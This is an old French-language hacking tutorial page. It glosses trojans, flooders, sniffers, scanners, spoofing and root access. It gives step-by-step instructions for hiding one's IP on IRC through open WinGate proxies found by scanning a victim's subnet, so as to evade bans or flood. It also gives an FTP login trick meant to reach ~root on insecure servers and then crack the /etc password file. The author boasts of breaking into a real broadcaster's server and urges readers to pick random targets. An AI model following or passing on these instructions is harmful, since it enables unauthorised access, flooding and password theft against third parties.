J'espère que le fonctionnement d'un troyen est plus clair à présent pour vous. Ne vous considérez pas hacker car vous utilisez un troyan horse car la faudrait pas abuser non plus mais dites vous que si vous connaissez la manière dont il marche, c'est déjà ça de gagné et ça vous aidera pour la suite...
 


Blooffer :

C'est un prog qui permet de ne pas être tracé quand on fait un hack. Autrement appelé brouiller d'ip. Mais bon c'est pas du 100% sûr car c'est comme tout, quand on trouve plus fort que soi en face, on tombe sur un os... Sur ce point J de la F avait raison.


Flooder :

Un flooder c'est un programme qui permet de ralentir les communications entre une personne et son fournisseur d'accès en gênant les transmissions des ports du modem de la dite personne. Pour utiliser ce programme contre quelqu'un, il suffit de connaître son adresse ip. Pour éviter de se faire Flooder, il suffit davoir un prog comme NukeNabber ou d'autres qui empêche le floodage (ça se dit?) et qui trouve l'ip de la personne qui vous floode. Après, à vous de juger du châtiment. Pour ma part, j'ai horreur qu'on m'agresse de quelque façon que ce soit. Crasher à mes heures? arf ! Qui sait?

Bon le flooder peut permettre de faire autre chose, c'est à dire de virer quelqu'un. Le principe, on envoie un "ping" à quelqu'un, c'est un signal qui déclenchera en retour un  signal de la personne que l'on veut flooder. Un signal c'est pas méchant mais si vous en envoyez beaucoup, les réponses seront plus nombreuses et le serveur saturera, et alors là le serveur va décider de virer la personne qui envoie trop de données, c'est-à-dire la victime du floodage (je sais toujours pas si ça se dit).

Je suis lancé alors je vais parler aussi du SYN flood. C'est un flood qui avait aussi pour but de crasher un serveur (sa connexion) mais qui passait par le port echo (7). Le but du port echo étant bien etendu de donner des rapport sur une cible ou une transmition, il répondait au flood et étaitdonc en position de faiblesse. A celà des parades on été crées notamment au niveau des firewalls et des démons. Maintenant si une machine reçoit par son port echo trop de demandes venants d'une ou de plusieurs machines en un temps très court, leurs ip sont enregistrées (elles le sont toujours de toute manière), et le port écho ne renvois plus de paquet a ces ip et n'en accepte plus non plus de celles ci. certain FW et demons vont même pluys loin et decidant se bloquer eux même leur port écho pour ne plus avoir de problèmes pour une durée limitée qui varie en fonction des paramètres choisis par l'admin, ou même pour une durée illimitée. En tout ca jusqu'à ce que le sysop se décide de le réouvrir (il sera donc bien sûr prévenu de la tentative de flood).


Sniffer:

Un sniffer c'est un logiciel qui permet d'intercepter des paquets sur un réseau. Cela s'avère très utile pour intercepter des adresses ip ou des contenus de paquets susceptibles de passer les firewalls. Cela permet aussi de connaître les noms d'hôtes autorisés ainsi que leur adresses MAC, etc... plein de bonnes choses utiles quoi. Cet article n'est pas fini, j'y reviendrais plus tard. D'ailleurs je mettrais bientôt gobbler dans la partie Progs pour que vous voyez à quoi ça ressemble et que vous appreniez à vous en servir.


Scanner d'ip et de ports :

C'est  un programme qui permet de savoir, à partir d'une adresse ip valable, à quel serveur elle appartient. Il permet également de savoir si le port que vous avez spécifié est ouvert sur tel ou tel machine. Il existe pleins de scanners très bien genre cyberkit et Wingate. Mais un scanner est un scanner et j'en ai mis quelques-uns dans la partie progs de ce site. Si vous avez linux je vous conseille nmap, il rends aussi beaucoup d'autres services. Vous le trouverez à cette adresse en attendant que je le mette sur mon site: http://www.insecure.org/nmap. Profitez en pour faire un tour sur ce site, il est pour moi bien meilleur que celui de rootshell. Pour les PC >>> ScanIP >>> télécharger.


Spoofing :

Ah, ah! Haute voltige, pas pour les lamerz. Ca consiste en quoi? Changer son adresse ip pour contourner des firewall ou autre protections ou pour ne pas se faire repérer, ne pas se faire tracer, passer incognito quoi. Les tout étant de prendre une ip qui n'aurait aucune chance de pouvoir vous être attribué quoi. Ca permet également d'intercepter des données transitant sur le réseaux pour les retourner vers soi. Different hacking quoi (à prononcer avec l'accent s'il vous plaît). C'est balaise et c'est à suivre, c'est pour bientôt...

Mais je vais quand même distinguer plusieurs choses, 3 pour être exact:
- spoofer d'irc, ça c'est super simple et c'est pas exactement de ça que je parlais au début.
-spoofer de mail, ça c'est déjà le niveau au dessus (à cent lieus au dessus)
-spoofer de connexion, ça c'est balaise, c'est de ça que je parlais plus haut.

Spoofer d'irc :

Ca sert à ne pas se faire nuker ou à pouvoir rentrer dans un salon où vous étiez banni ou encore flooder en toute impunité...

Pour cela il vous faudra avoir un programme que l'on appelle un scanner d'ip je vous reporte à l'article correspondant si vous ne l'avez pas déjà lu. Et puis vous aurez aussi besoin d'un Mirc mais ça si vous savez pas ce que c'est bah je vois pas pourquoi vous lisez cet article car manifestement vous n'en aurez pas besoin.

Quand vous vous connecté à internet votre fournisseur d'accès vous donne une ip. Jusque là tout va bien. Mais le fournisseurs d'accès pourra à l'aide de cet ip remonter jusqu'à vous. C'est donc une bonne raison pour, si vous voulez faire des truc "pas cool", la cacher. Et tant qu'à faire on va prendre celle d'un autre. Alors vous allez vous allez lancer mirc et vous connecter à un serveur irc quelconque et rentrer dans un salon. Le nom de celui ci n'a pas d'importance du moment qu'il y a au mons une personne dedans. Vous allez trouver son ip en faisant un /dns ou un whois. Si vous savez pas comment faire reportez à vous à l'article adresse ip. Une fois que vous avez son ip vous allez lancer votre scanner d'ip. Là on va faire un exemple:

Imaginez que le nick (pseudo) du mec soit Assassin et que l'ip que vous ayez trouvé de lui soit 152.194.56.132 (arf encore un mec d'aol, ils sont partout)

Etant donné qu'un scanner scanne toujours les ip de 0 à 255 et toujours en ordre croissant on va rentrer dans le scanner les ip suivantes: 152.194.56.0 et 152.194.56.255. On choisit un port, le 23, celui du telnet. Et on lance la recherche. Il va nous sortir plusieurs ip (espérons). S'il n'en sort pas, on fait un /dns sur un autre nick et ainsi de suite jusqu'à trouver des ip mais normalement pas de problèmes. Les ip qui apparaîtront sont les ip de machines ayant le port choisi (ici le 23) ouvert. Imaginez que plusieurs ip sortent dont celle ci: 152.194.56.13

Maintenant vous allez taper l'instruction suivante sur irc: /serveur   ip_du_mec   port_tenet
Dans notre exemple: /server 152.194.56.13 23

Mirc va alors vous écrire les commandes suivantes:
*** Disconnected

*** Connecting to 152.194.56.13 (23)

Local host: rhylmachine (152.172.127.204)

ÿû ÿûÿýWinGate>NICK endrix
Connecting to host NICK...Host name lookup for 'NICK' failed
USER RhylKim "rhylmachine" "152.194.56.13" nono lpti robo
Connecting to host USER RhylKim "rhylmachine" "152.194.56.13" ...Host name lookup for ' USER
RhylKim "rhylmachine" "152.194.56.13" ' failed

Une fois votre ip spoofée auprès d'irc il va falloir vous reconnecter car la précédente manip vous a déconnecté. et pour ça vous allez faire: /raw   nom_du_serveur   port_irc

Dans notre exemple: /raw irc01.irc.aol.com 6667

Mirc va alors vous écrire les commandes suivantes:
aol.com rg "rhylmachine" "152.194.56.13" ...Host name lookup for ' USER
RhylKim "rhylmachine" "152.194.56.13" ' failed
Connecting to host irc01.irc.aol.com ...Connected

Maintenant les formalités:
votre nick: /nick votre_nick
Dans notre exemple: /nick RhylKim

puis:
/user ident x x full_name
Dans notre exemple: /user nono lpti robo x x rhylmachine

Voilà c'est bon votre adresse ip est spoofée sur mirc. Si quelqu'un fait un /dns ou un whois sur vous, c'est l'adresse ip spoofée qu'il verra et non le vôtre. C'est là que je me retire et que vous allez pouvoir vous affirmer. Je suis pas un partisan du flood ou du nuke sur irc mais comme je ne pourrais pas empêcher les lames de les utiliser bah je vous donne la méthode de vous en préserver. Et puis merde faut mettre fin au bannissement des salons. ;-)

Les articles sur les autres spoff possibles viendront bientôt. Donc patience...
 


Root :

Un root c'est un mec, ou une fille, qui a le statut de super-user, c'est à dire qu'il a les droits sur un réseau de n'importe quel user (utilisateur) normal mais qu'il a en plus accès a des commandes et des secteurs que les autres n'ont pas. Ca lui permettra de changer ce qu'il veut, d'importer ou d'exporter des fichiers, de créer des programmes sur la machine, de formater, de supprimer, ... Le but de n'importe quel hacker est de pouvoir devenir root sur une bécane. Mais pour cela il faut un login (root la plupart du temps) et un password. Pour ça on verra plus tard.


Hack par ftp :

On ne m'a pas encore fait le reproche de ne pas donner assez de techniques de hacking dans la rubrique hacking mais dans un désir d'anticiper ce reproche, je vais donner une manière de hacker un serveur non sécurisé par ftp. D'abord on va expliquer ce qu'est ftp. ftp c'est un protocole qui permet de transmettre des fichiers d'un ordinateur à un autre. Les ports qui lui sont attribués sont les n°20 et 21. Quand vous allez sur un site de Warez pour choper des progs crackés vous passez généralement par ftp, vous voulez télécharger une page WEB, c'est aussi par ftp, quand vous vous rendez sur un serveur en tant que user, c'est aussi des fois par ftp. Si vous êtes sous windows, pour ouvrir une fenêtre ftp, il faut faire: Démarrer, Exécuter, et taper "ftp -n". Bon, faut pas pousser non plus, c'est pas aussi simple que ça de hacker un serveur par ftp, il suffit pas d'ouvrir la fenêtre ftp, c'est plus compliqué car chaque serveur demande un login et un password pour chaque user.

Le truc que je vais vous donner ne marche que sur les serveurs non sécurisés alors n'essayez pas ça sur le Pentagone, ça marchera pas. On parle toujours du Pentagone, de la CIA, de la Nasa... mais il y a pleins de serveurs sécurisés dans le monde et ils ne sont pas forcement gouvernementaux, loin de là...

Je vous donne le truc et on en reparle après:

                      open url_du_site
                      quote user ftp
                      quote cwd ~root
                      quote pass ftp

Mettez des espaces ou je les ai mis et tout ce passera bien.

Exemple:        open www.assassin.com
                      quote user ftp
                      quote cwd ~root
                      quote pass ftp
Ici le serveur a comme adresse url: http://www.assassin.com/.

Ces instructions doivent être entrées dans un fenêtre ressemblant beaucoup à celle du dos, à chaque ligne, il y aura marqué "ftp>". Pour ouvrir cette fenêtre on procède comme expliqué précedement. Une fois connecté à un site (après avoir tapé: open url_du_site), vous verez apparaitre "Connected to url_du_site". Il se peut qu'après vous être connecté à un serveur vous receviez le message suivant: "Ce serveur est protégé" ou "attention aux malversations que vous pourrez faire" ou "regardes par la fenêtre, les flics sont déjà en bas de chez toi"... Dans ce cas là c'est même pas la peine d'aller plus loin car à 99% le serveur est sécurisé car si l'administrateur réseau a pu être assez consciencieux pour mettre un message d'avertissement, il l'est assez pour nous empêcher de pénétrer de cette manière dans sont serveur. :-(
Il se peut même qu'une fois connecté, vous voyez "Connexion closed by remote host.", là c'est encore plus vache, c'est que le serveur n'est pas accessible de cette manière par ftp. De cette manière seulement.... ;-)

On va voir maintenant ce que le serveur répond en fonction de ce que l'on marque et de si oui ou non on pourra rentrer dedans:
Ce qui est en bleu c'est ce que l'on tape
Ce qui est en jaune c'est ce que le serveur répond
Ce qui est en vert c'est soit ftp soit des remarques de ma part
 

Serveur que l'on pourra hacker par ce moyen :

Serveur que l'on ne pourra pas hacker par ce moyen :

ftp>open www.assassin.com

open www.assassin.com

Connected to www.assassin.com
220 websrv1 Microsoft FTP Service (Version 4.0).

Connected to www.assassin.com
websrv1 Microsoft FTP Service (Version 4.0).

"Ce qu'il y aura marqué dépendra du système d'exploitation, de la version de celui ci... Il se peut même qu'il y ait marqué la
date et l'heure de la dernière mise à jour."

"Ce qu'il y aura marqué dépendra du système d'exploitation, de la version de celui ci... Il se peut même qu'il y ait marqué la
date et l'heure de la dernière mise à jour."

ftp>quote user ftp

ftp>quote user ftp

331 Anonymous acces allowed, send identify (e-mail name) as password.

331 Password required for ftp.

ftp>quote cwd ~root

ftp>quote cwd ~root

530 Please login with USER and PASS.

530 Please login with USER and PASS.

ftp>quote pass ftp

ftp>quote pass ftp

230 Anonymous user logged in.

530 User ftp cannot log in.

Voilà, logiquement et sauf erreur vous êtes root ou tout du moins user, si c'est le cas, il faut trouver /etc puis décrypter le password et là vous vous connecterez en tant que root.     :-)

Bon, bah là, rien à faire avec cette méthode, c'est probablement un serveur dit "secure", quoi que... Bref une seule remarque:                          :-(

Une fois que vous êtes root ou user, ca sont les commandes ftp qui s'appliquent (pas les commandes dos ni les commandes unix):

          mkdir : pour créer un répertoire (exemple: mkdir assassin crée le répertoire assassin).
          rmdir : pour supprimer un répertoire (exemple: rmdir assassin supprime le répertoire assassin).
          pwd : pour voir ou vous êtes sur le disque.
          cd : pour aller dans un répertoire (exemple: cd assassin pour aller dans le répertoire assassin).
          dir : pour voir le contenu de la racine ou du répertoire où vous êtes.
          cd / : pour revenir à la racine. Ne pas oublier l'espace entre cd et /.
          cd .. : pour revenir au répertoire précédent. Ne pas oublier l'espace entre cd et ..
          del : pour supprimer un fichier (exemple: del assassin.txt supprime le fichier assassin.txt).
          get : pour prendre un fichier et le mettre sur votre bureau (exemple: get assassin.txt vous donne le fichier assassin.txt)

Pour vous illustrer un peu cet artile je suis allé sur altavista (pas astalavista) et j'ai tapé un mot au hasard (en l'occurrence ici c'était télé), je suis tombé sur une dizaine de sites et j'en ai pris un au hasard, j'ai noté son url. Là c'était www.comedie.com (vous savez, le serveur de la chaîne télé comédie qui passe sur le câble). J'ai appliqué ce que j'ai écris au dessus plus deux ou trois autres petits trucs et je suis devenu root sur la bécane, le temps de m'amuser un petit peu. Je n'ai rien supprimé vu que je suis un gentil hacker mais j'ai laissé des traces de mon passage... En utilisant cette méthode vous ne serez pas root (777) sur cette bécane mais vous pourrez quand même faire pas mal de choses.  Cet exploit étant périmé sur la plupart des bécanes, vous ne serez que User sur un account anonymous, cependant la perle rare se trouve quelque part, malheureusement avec le temps elle devient de plus en plus rare.

Pour quitter ftp, vous n'avez qu'à taper "quit". Voilà c'est tout, amusez vous bien mais ne foutez pas la merde sinon je ne donnerais plus rien.

PS: Une fois hacké, ce serveur mettra en place des instruments de recherche pour éviter que cela ne recommence. Alors si vous êtes débutant, cherchez un autre serveur, faites comme j'ai fais pour le serveur de comédie: Altavista.


SUIVANT